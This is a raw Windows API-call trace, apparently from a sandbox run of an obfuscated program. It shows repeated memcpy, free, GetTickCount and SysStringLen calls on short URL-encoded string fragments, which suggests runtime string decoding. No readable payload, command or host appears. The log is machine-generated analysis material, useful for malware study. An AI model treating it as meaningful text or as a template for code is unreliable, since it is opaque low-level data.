0x24adf9bcae8 [0102.072] free (_Block=0x24ae148c440) [0102.072] GetTickCount () returned 0x210d808 [0102.072] memcpy (in: _Dst=0x24adf9b92b8, _Src=0x24adf9bcaec, _Size=0x4 | out: _Dst=0x24adf9b92b8) returned 0x24adf9b92b8 [0102.072] memcpy (in: _Dst=0x24adf9b9318, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9318) returned 0x24adf9b9318 [0102.073] memcpy (in: _Dst=0x24adf9bc63c, _Src=0x24adf9b9318, _Size=0x4 | out: _Dst=0x24adf9bc63c) returned 0x24adf9bc63c [0102.073] memcpy (in: _Dst=0x24adf9bc638, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc638) returned 0x24adf9bc638 [0102.073] free (_Block=0x24ae148c4a0) [0102.073] GetTickCount () returned 0x210d808 [0102.073] memcpy (in: _Dst=0x24adf9b9098, _Src=0x24adf9bc63c, _Size=0x4 | out: _Dst=0x24adf9b9098) returned 0x24adf9b9098 [0102.073] memcpy (in: _Dst=0x24adf9b8e58, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8e58) returned 0x24adf9b8e58 [0102.073] memcpy (in: _Dst=0x24adf9bc99c, _Src=0x24adf9b8e58, _Size=0x4 | out: _Dst=0x24adf9bc99c) returned 0x24adf9bc99c [0102.073] memcpy (in: _Dst=0x24adf9bc998, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc998) returned 0x24adf9bc998 [0102.073] free (_Block=0x24ae148bed0) [0102.073] GetTickCount () returned 0x210d808 [0102.073] memcpy (in: _Dst=0x24adf9b91b8, _Src=0x24adf9bc99c, _Size=0x4 | out: _Dst=0x24adf9b91b8) returned 0x24adf9b91b8 [0102.073] memcpy (in: _Dst=0x24adf9a597c, _Src=0x24adf9b91b8, _Size=0x4 | out: _Dst=0x24adf9a597c) returned 0x24adf9a597c [0102.073] memcpy (in: _Dst=0x24adf9a597a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a597a) returned 0x24adf9a597a [0102.073] memcpy (in: _Dst=0x24adf9a5976, _Src=0x24adf9b9098, _Size=0x4 | out: _Dst=0x24adf9a5976) returned 0x24adf9a5976 [0102.073] memcpy (in: _Dst=0x24adf9a5974, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5974) returned 0x24adf9a5974 [0102.073] memcpy (in: _Dst=0x24adf9a5970, _Src=0x24adf9b92b8, _Size=0x4 | out: _Dst=0x24adf9a5970) returned 0x24adf9a5970 [0102.073] memcpy (in: _Dst=0x24adf9a596e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a596e) returned 0x24adf9a596e [0102.073] memcpy (in: _Dst=0x24adf9a596a, _Src=0x24adf9b9198, _Size=0x4 | out: _Dst=0x24adf9a596a) returned 0x24adf9a596a [0102.073] memcpy (in: _Dst=0x24adf9a5968, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5968) returned 0x24adf9a5968 [0102.074] free (_Block=0x24ae13c76e0) [0102.074] SysStringLen (param_1="%79%7a%65%72") returned 0xc [0102.074] memcpy (in: _Dst=0x24adf9bc7b8, _Src=0x24ae14849f0, _Size=0x8 | out: _Dst=0x24adf9bc7b8) returned 0x24adf9bc7b8 [0102.074] free (_Block=0x24ae14849f0) [0102.074] GetTickCount () returned 0x210d808 [0102.074] memcpy (in: _Dst=0x24adf9b9378, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b9378) returned 0x24adf9b9378 [0102.075] memcpy (in: _Dst=0x24adf9a612e, _Src=0x24ae1a0f85c, _Size=0x14 | out: _Dst=0x24adf9a612e) returned 0x24adf9a612e [0102.075] memcpy (in: _Dst=0x24adf9a6128, _Src=0x24adf9b9378, _Size=0x6 | out: _Dst=0x24adf9a6128) returned 0x24adf9a6128 [0102.075] free (_Block=0x24ae13c76b0) [0102.076] memcpy (in: _Dst=0x24adf9bc69e, _Src=0x24adf9b8ef8, _Size=0x2 | out: _Dst=0x24adf9bc69e) returned 0x24adf9bc69e [0102.076] memcpy (in: _Dst=0x24adf9bc69c, _Src=0x24adf9b9258, _Size=0x2 | out: _Dst=0x24adf9bc69c) returned 0x24adf9bc69c [0102.076] memcpy (in: _Dst=0x24adf9bc69a, _Src=0x24adf9b8c78, _Size=0x2 | out: _Dst=0x24adf9bc69a) returned 0x24adf9bc69a [0102.076] memcpy (in: _Dst=0x24adf9bc698, _Src=0x24adf9b8e38, _Size=0x2 | out: _Dst=0x24adf9bc698) returned 0x24adf9bc698 [0102.076] free (_Block=0x24ae13c7560) [0102.076] GetTickCount () returned 0x210d808 [0102.076] GetTickCount () returned 0x210d808 [0102.076] memcpy (in: _Dst=0x24adf9b91d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b91d8) returned 0x24adf9b91d8 [0102.076] memcpy (in: _Dst=0x24adf9bc87c, _Src=0x24adf9b91d8, _Size=0x4 | out: _Dst=0x24adf9bc87c) returned 0x24adf9bc87c [0102.076] memcpy (in: _Dst=0x24adf9bc878, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc878) returned 0x24adf9bc878 [0102.076] free (_Block=0x24ae13c7260) [0102.076] GetTickCount () returned 0x210d808 [0102.076] memcpy (in: _Dst=0x24adf9b8c38, _Src=0x24adf9bc87c, _Size=0x4 | out: _Dst=0x24adf9b8c38) returned 0x24adf9b8c38 [0102.077] memcpy (in: _Dst=0x24adf9b8cf8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8cf8) returned 0x24adf9b8cf8 [0102.077] memcpy (in: _Dst=0x24adf9bc6fc, _Src=0x24adf9b8cf8, _Size=0x4 | out: _Dst=0x24adf9bc6fc) returned 0x24adf9bc6fc [0102.077] memcpy (in: _Dst=0x24adf9bc6f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc6f8) returned 0x24adf9bc6f8 [0102.077] free (_Block=0x24ae13c7050) [0102.077] GetTickCount () returned 0x210d808 [0102.077] memcpy (in: _Dst=0x24adf9b8fb8, _Src=0x24adf9bc6fc, _Size=0x4 | out: _Dst=0x24adf9b8fb8) returned 0x24adf9b8fb8 [0102.077] memcpy (in: _Dst=0x24adf9b90d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b90d8) returned 0x24adf9b90d8 [0102.078] memcpy (in: _Dst=0x24adf9bbafc, _Src=0x24adf9b90d8, _Size=0x4 | out: _Dst=0x24adf9bbafc) returned 0x24adf9bbafc [0102.078] memcpy (in: _Dst=0x24adf9bbaf8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbaf8) returned 0x24adf9bbaf8 [0102.078] free (_Block=0x24ae13c73e0) [0102.078] GetTickCount () returned 0x210d808 [0102.078] memcpy (in: _Dst=0x24adf9b8f18, _Src=0x24adf9bbafc, _Size=0x4 | out: _Dst=0x24adf9b8f18) returned 0x24adf9b8f18 [0102.078] memcpy (in: _Dst=0x24adf9b8c98, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8c98) returned 0x24adf9b8c98 [0102.078] memcpy (in: _Dst=0x24adf9bb52c, _Src=0x24adf9b8c98, _Size=0x4 | out: _Dst=0x24adf9bb52c) returned 0x24adf9bb52c [0102.078] memcpy (in: _Dst=0x24adf9bb528, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb528) returned 0x24adf9bb528 [0102.079] free (_Block=0x24ae13c7530) [0102.079] GetTickCount () returned 0x210d808 [0102.079] memcpy (in: _Dst=0x24adf9b8fd8, _Src=0x24adf9bb52c, _Size=0x4 | out: _Dst=0x24adf9b8fd8) returned 0x24adf9b8fd8 [0102.079] memcpy (in: _Dst=0x24adf9a55fc, _Src=0x24adf9b8fd8, _Size=0x4 | out: _Dst=0x24adf9a55fc) returned 0x24adf9a55fc [0102.079] memcpy (in: _Dst=0x24adf9a55fa, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55fa) returned 0x24adf9a55fa [0102.079] memcpy (in: _Dst=0x24adf9a55f6, _Src=0x24adf9b8f18, _Size=0x4 | out: _Dst=0x24adf9a55f6) returned 0x24adf9a55f6 [0102.079] memcpy (in: _Dst=0x24adf9a55f4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55f4) returned 0x24adf9a55f4 [0102.079] memcpy (in: _Dst=0x24adf9a55f0, _Src=0x24adf9b8fb8, _Size=0x4 | out: _Dst=0x24adf9a55f0) returned 0x24adf9a55f0 [0102.079] memcpy (in: _Dst=0x24adf9a55ee, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55ee) returned 0x24adf9a55ee [0102.079] memcpy (in: _Dst=0x24adf9a55ea, _Src=0x24adf9b8c38, _Size=0x4 | out: _Dst=0x24adf9a55ea) returned 0x24adf9a55ea [0102.079] memcpy (in: _Dst=0x24adf9a55e8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a55e8) returned 0x24adf9a55e8 [0102.080] free (_Block=0x24ae13c70e0) [0102.080] SysStringLen (param_1="%72%69%65%6e") returned 0xc [0102.080] memcpy (in: _Dst=0x24adf9bb4f8, _Src=0x24ae1484d30, _Size=0x8 | out: _Dst=0x24adf9bb4f8) returned 0x24adf9bb4f8 [0102.080] free (_Block=0x24ae1484d30) [0102.080] GetTickCount () returned 0x210d808 [0102.081] memcpy (in: _Dst=0x24adf9b91f8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b91f8) returned 0x24adf9b91f8 [0102.081] memcpy (in: _Dst=0x24adf9a562e, _Src=0x24ae1a0f85c, _Size=0x14 | out: _Dst=0x24adf9a562e) returned 0x24adf9a562e [0102.081] memcpy (in: _Dst=0x24adf9a5628, _Src=0x24adf9b91f8, _Size=0x6 | out: _Dst=0x24adf9a5628) returned 0x24adf9a5628 [0102.081] free (_Block=0x24ae13c7350) [0102.082] memcpy (in: _Dst=0x24adf9bbb5e, _Src=0x24adf9b8e18, _Size=0x2 | out: _Dst=0x24adf9bbb5e) returned 0x24adf9bbb5e [0102.082] memcpy (in: _Dst=0x24adf9bbb5c, _Src=0x24adf9b9238, _Size=0x2 | out: _Dst=0x24adf9bbb5c) returned 0x24adf9bbb5c [0102.082] memcpy (in: _Dst=0x24adf9bbb5a, _Src=0x24adf9b8ff8, _Size=0x2 | out: _Dst=0x24adf9bbb5a) returned 0x24adf9bbb5a [0102.082] memcpy (in: _Dst=0x24adf9bbb58, _Src=0x24adf9b9278, _Size=0x2 | out: _Dst=0x24adf9bbb58) returned 0x24adf9bbb58 [0102.083] free (_Block=0x24ae13c7290) [0102.083] GetTickCount () returned 0x210d818 [0102.083] GetTickCount () returned 0x210d818 [0102.084] SysStringLen (param_1="%32%7c%37%7c") returned 0xc [0102.086] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Å", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.086] GetTickCount () returned 0x210d818 [0102.087] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.088] free (_Block=0x24ae13c7620) [0102.088] free (_Block=0x24ae13c71d0) [0102.088] free (_Block=0x24ae139be70) [0102.089] free (_Block=0x24ae139b990) [0102.089] free (_Block=0x24ae139b930) [0102.089] free (_Block=0x24ae139bcc0) [0102.089] free (_Block=0x24ae13c7560) [0102.090] free (_Block=0x24ae13c75f0) [0102.090] free (_Block=0x24ae13c73b0) [0102.091] free (_Block=0x24ae139be10) [0102.091] free (_Block=0x24ae139b8a0) [0102.091] free (_Block=0x24ae13c73e0) [0102.091] free (_Block=0x24ae13c7680) [0102.091] free (_Block=0x24ae139bd20) [0102.091] free (_Block=0x24ae139bf60) [0102.092] free (_Block=0x24ae13c71a0) [0102.092] free (_Block=0x24ae139b840) [0102.092] free (_Block=0x24ae139bfc0) [0102.092] free (_Block=0x24ae139bea0) [0102.092] free (_Block=0x24ae13c7170) [0102.093] free (_Block=0x24ae13c7470) [0102.094] free (_Block=0x24ae13c7410) [0102.094] free (_Block=0x24ae13c7260) [0102.095] free (_Block=0x24ae13c7140) [0102.095] free (_Block=0x24ae13c7590) [0102.096] free (_Block=0x24ae13c75c0) [0102.104] free (_Block=0x24ae13c7110) [0102.104] free (_Block=0x24ae13c7740) [0102.105] free (_Block=0x24ae13c76e0) [0102.105] free (_Block=0x24ae148bed0) [0102.105] free (_Block=0x24ae148bd20) [0102.105] free (_Block=0x24ae148c4a0) [0102.105] free (_Block=0x24ae148c440) [0102.105] free (_Block=0x24ae148be70) [0102.106] free (_Block=0x24ae148c200) [0102.106] free (_Block=0x24ae148bde0) [0102.106] free (_Block=0x24ae148bea0) [0102.106] free (_Block=0x24ae148bdb0) [0102.106] free (_Block=0x24ae148c1a0) [0102.106] free (_Block=0x24ae148c0e0) [0102.107] free (_Block=0x24ae148bf60) [0102.107] free (_Block=0x24ae148c050) [0102.107] free (_Block=0x24ae148c170) [0102.107] free (_Block=0x24ae148c410) [0102.108] free (_Block=0x24ae148bff0) [0102.109] free (_Block=0x24ae148c380) [0102.110] free (_Block=0x24ae148c140) [0102.111] free (_Block=0x24ae148c470) [0102.111] free (_Block=0x24ae148c110) [0102.112] free (_Block=0x24ae148be40) [0102.113] free (_Block=0x24ae148bd80) [0102.113] free (_Block=0x24ae148c350) [0102.113] free (_Block=0x24ae148c3b0) [0102.114] free (_Block=0x24ae148c320) [0102.115] free (_Block=0x24ae148c1d0) [0102.115] free (_Block=0x24ae148c080) [0102.116] free (_Block=0x24ae148bf30) [0102.116] free (_Block=0x24ae148c0b0) [0102.117] free (_Block=0x24ae148bd50) [0102.117] free (_Block=0x24ae148c2f0) [0102.118] free (_Block=0x24ae148bf90) [0102.118] free (_Block=0x24ae148be10) [0102.119] free (_Block=0x24ae148c260) [0102.119] free (_Block=0x24ae148c020) [0102.120] free (_Block=0x24ae148c2c0) [0102.121] free (_Block=0x24ae148bfc0) [0102.122] free (_Block=0x24ae148c290) [0102.122] free (_Block=0x24ae148c230) [0102.123] free (_Block=0x24ae148bf00) [0102.123] free (_Block=0x24ae148c3e0) [0102.124] free (_Block=0x24ae139dee0) [0102.125] free (_Block=0x24ae139de80) [0102.126] free (_Block=0x24ae139deb0) [0102.127] free (_Block=0x24ae139dd30) [0102.128] free (_Block=0x24ae139d970) [0102.130] free (_Block=0x24ae139dd00) [0102.130] free (_Block=0x24ae139dcd0) [0102.131] free (_Block=0x24ae139db50) [0102.132] free (_Block=0x24ae139e0f0) [0102.133] free (_Block=0x24ae139dfd0) [0102.133] free (_Block=0x24ae139db80) [0102.135] free (_Block=0x24ae139dac0) [0102.136] free (_Block=0x24ae139dfa0) [0102.136] free (_Block=0x24ae139e090) [0102.137] free (_Block=0x24ae139de50) [0102.137] free (_Block=0x24ae139da60) [0102.138] free (_Block=0x24ae139dca0) [0102.139] free (_Block=0x24ae139d9a0) [0102.139] free (_Block=0x24ae139db20) [0102.140] free (_Block=0x24ae139da30) [0102.140] free (_Block=0x24ae139de20) [0102.141] free (_Block=0x24ae139dc70) [0102.141] free (_Block=0x24ae139dc10) [0102.142] free (_Block=0x24ae139dbe0) [0102.142] free (_Block=0x24ae139ddc0) [0102.143] free (_Block=0x24ae139e060) [0102.145] MulDiv (nNumber=1030, nNumerator=100, nDenominator=2158) returned 48 [0102.145] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.145] GetTickCount () returned 0x210d856 [0102.145] SysStringLen (param_1="%54%42%51%61") returned 0xc [0102.145] SysStringLen (param_1="%43%3d%26%c2%96") returned 0xf [0102.146] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.146] SysStringLen (param_1="%74%69%6e%67") returned 0xc [0102.147] SysStringLen (param_1="%65%6c%69%6e") returned 0xc [0102.148] SysStringLen (param_1="%6c%6c%65%68") returned 0xc [0102.148] SysStringLen (param_1="%c2%ad%5b%c2%bb%0e") returned 0x12 [0102.148] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="­", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.148] SysStringLen (param_1="%79%42%51%5a") returned 0xc [0102.149] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.149] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ù", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.149] SysStringLen (param_1="%79%42%77%62") returned 0xc [0102.150] SysStringLen (param_1="%c3%b2%c2%9d%c3%b9%c2%9c") returned 0x18 [0102.150] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ò", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.150] GetTickCount () returned 0x210d856 [0102.150] SysStringLen (param_1="%c2%ac%4e%4b%0f") returned 0xf [0102.151] GetTickCount () returned 0x210d856 [0102.151] SysStringLen (param_1="%c2%8a%03%c3%bb%0c") returned 0x12 [0102.151] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.151] GetTickCount () returned 0x210d856 [0102.151] SysStringLen (param_1="%27%c2%86%5a%4b") returned 0xf [0102.152] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.152] GetTickCount () returned 0x210d856 [0102.152] SysStringLen (param_1="%17%35%19%32") returned 0xc [0102.154] GetTickCount () returned 0x210d856 [0102.154] SysStringLen (param_1="%c2%92%7a%c3%88%4a") returned 0x12 [0102.154] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x92", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.154] GetTickCount () returned 0x210d856 [0102.154] SysStringLen (param_1="%61%64%67%71") returned 0xc [0102.154] GetTickCount () returned 0x210d856 [0102.155] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.156] MulDiv (nNumber=1009, nNumerator=100, nDenominator=2153) returned 47 [0102.156] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.156] GetTickCount () returned 0x210d856 [0102.156] SysStringLen (param_1="%78%61%6d%69") returned 0xc [0102.157] SysStringLen (param_1="%c2%b8%5a%07%2f") returned 0xf [0102.157] SysStringLen (param_1="%5c%c2%87%c3%84%3a") returned 0x12 [0102.158] SysStringLen (param_1="%c2%b0%75%c2%b7%3c") returned 0x12 [0102.158] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="°", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.158] SysStringLen (param_1="%53%c3%b3%c3%a4%4e") returned 0x12 [0102.158] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¤", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.159] SysStringLen (param_1="%57%61%72%72") returned 0xc [0102.159] SysStringLen (param_1="%3b%c2%a4%56%c2%82") returned 0x12 [0102.160] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x84", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.160] SysStringLen (param_1="%65%78%6f%70") returned 0xc [0102.161] GetTickCount () returned 0x210d866 [0102.161] SysStringLen (param_1="%c2%b4%c2%9f%29%c3%b9") returned 0x15 [0102.161] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="´", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.161] GetTickCount () returned 0x210d866 [0102.161] SysStringLen (param_1="%2d%c2%a9%70%69") returned 0xf [0102.161] GetTickCount () returned 0x210d866 [0102.162] SysStringLen (param_1="%c2%8a%39%2d%29") returned 0xf [0102.162] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.162] GetTickCount () returned 0x210d866 [0102.162] SysStringLen (param_1="%c3%a5%c2%a8%c3%bb%c2%8b") returned 0x18 [0102.163] GetTickCount () returned 0x210d866 [0102.164] SysStringLen (param_1="%0e%c3%b9%0a%21") returned 0xf [0102.164] GetTickCount () returned 0x210d866 [0102.164] SysStringLen (param_1="%41%51%43%41") returned 0xc [0102.164] GetTickCount () returned 0x210d866 [0102.164] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0102.166] MulDiv (nNumber=1002, nNumerator=100, nDenominator=2168) returned 46 [0102.166] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.166] GetTickCount () returned 0x210d866 [0102.166] SysStringLen (param_1="%22%c3%a9%2b%07") returned 0xf [0102.167] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Õ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.167] SysStringLen (param_1="%c2%8c%c2%b9%c2%aa%13") returned 0x15 [0102.167] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8c", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.167] SysStringLen (param_1="%41%59%47%41") returned 0xc [0102.168] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.168] SysStringLen (param_1="%c3%af%68%c2%8b") returned 0xf [0102.168] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9c", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.169] SysStringLen (param_1="%c2%b8%66%75%60") returned 0xf [0102.169] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¸", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.169] SysStringLen (param_1="%63%6f%79%6f") returned 0xc [0102.169] SysStringLen (param_1="%06%c3%9e%0e%c3%bd") returned 0x12 [0102.169] SysStringLen (param_1="%c3%af%42%46%64") returned 0xf [0102.170] GetTickCount () returned 0x210d866 [0102.170] SysStringLen (param_1="%1b%c2%a5%69%c2%93") returned 0x12 [0102.170] GetTickCount () returned 0x210d866 [0102.170] SysStringLen (param_1="%c2%90%4c%58%45") returned 0xf [0102.170] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x90", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.170] GetTickCount () returned 0x210d866 [0102.170] SysStringLen (param_1="%0f%c2%8b%47%41") returned 0xf [0102.172] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ø", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.172] GetTickCount () returned 0x210d866 [0102.172] SysStringLen (param_1="%74%61%74%65") returned 0xc [0102.172] GetTickCount () returned 0x210d866 [0102.172] SysStringLen (param_1="%3b%c2%bf%c3%a9%40") returned 0x12 [0102.173] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x84", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.173] GetTickCount () returned 0x210d866 [0102.174] SysStringLen (param_1="%c3%bf%11%50%c2%92") returned 0x12 [0102.174] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8c", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.174] GetTickCount () returned 0x210d875 [0102.176] SysStringLen (param_1="%41%55%47%41") returned 0xc [0102.176] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fc910 | out: ppv=0xd6788fc910*=0x24adf97e528) returned 0x0 [0102.178] MulDiv (nNumber=1022, nNumerator=100, nDenominator=2190) returned 47 [0102.178] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.178] GetTickCount () returned 0x210d875 [0102.179] SysStringLen (param_1="%43%3d%26%c2%96") returned 0xf [0102.179] SysStringLen (param_1="%c2%94%c3%90%0f%c3%ac") returned 0x15 [0102.179] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x94", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.179] SysStringLen (param_1="%18%44%c3%9f%c3%8e") returned 0x12 [0102.180] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Á", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.180] SysStringLen (param_1="%72%69%62%65") returned 0xc [0102.180] SysStringLen (param_1="%74%61%74%69") returned 0xc [0102.180] SysStringLen (param_1="%5e%c3%a8%01%39") returned 0xf [0102.181] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="©", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.181] SysStringLen (param_1="%c2%a3%50%c2%94%37") returned 0x12 [0102.181] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="£", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.181] SysStringLen (param_1="%77%38%2b%c2%ba") returned 0xf [0102.181] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="È", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.182] SysStringLen (param_1="%c2%b5%07%7b%2c") returned 0xf [0102.182] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Æ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.182] SysStringLen (param_1="%61%3e%05%c2%9f") returned 0xf [0102.183] SysStringLen (param_1="%27%c2%86%5a%4b") returned 0xf [0102.183] SysStringLen (param_1="%43%6f%6c%64") returned 0xc [0102.183] SysStringLen (param_1="%c3%93%48%c2%97%c2%bc") returned 0x15 [0102.184] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ó", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.184] SysStringLen (param_1="%61%3e%01%c2%9f") returned 0xf [0102.185] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.185] MulDiv (nNumber=1007, nNumerator=100, nDenominator=2197) returned 46 [0102.185] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.185] GetTickCount () returned 0x210d875 [0102.185] SysStringLen (param_1="%09%c2%93%c2%8c%c3%b1") returned 0x15 [0102.185] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x93", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.185] SysStringLen (param_1="%66%c3%ac%c3%b4%c2%ad") returned 0x15 [0102.186] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x91", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.186] SysStringLen (param_1="%67%41%51%5a") returned 0xc [0102.186] SysStringLen (param_1="%54%72%6f%6c") returned 0xc [0102.187] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.187] SysStringLen (param_1="%3b%c2%85%c3%a4%40") returned 0x12 [0102.187] SysStringLen (param_1="%6e%74%73") returned 0x9 [0102.187] SysStringLen (param_1="%3b%c2%a4%56%c2%82") returned 0x12 [0102.187] SysStringLen (param_1="%6a%69%43%75") returned 0xc [0102.188] SysStringLen (param_1="%36%10%c3%8d%5d") returned 0xf [0102.188] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ï", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0102.188] SysStringLen (param_1="%6f%75%73") returned 0x9 [0102.188] SysStringLen (param_1="%6e%69%68%69") returned 0xc [0102.188] SysStringLen (param_1="%c2%a1%c3%a2%64%74") returned 0x12 [0102.189] SysStringLen (param_1="%0b%71%c3%ac%c3%a6") returned 0x12 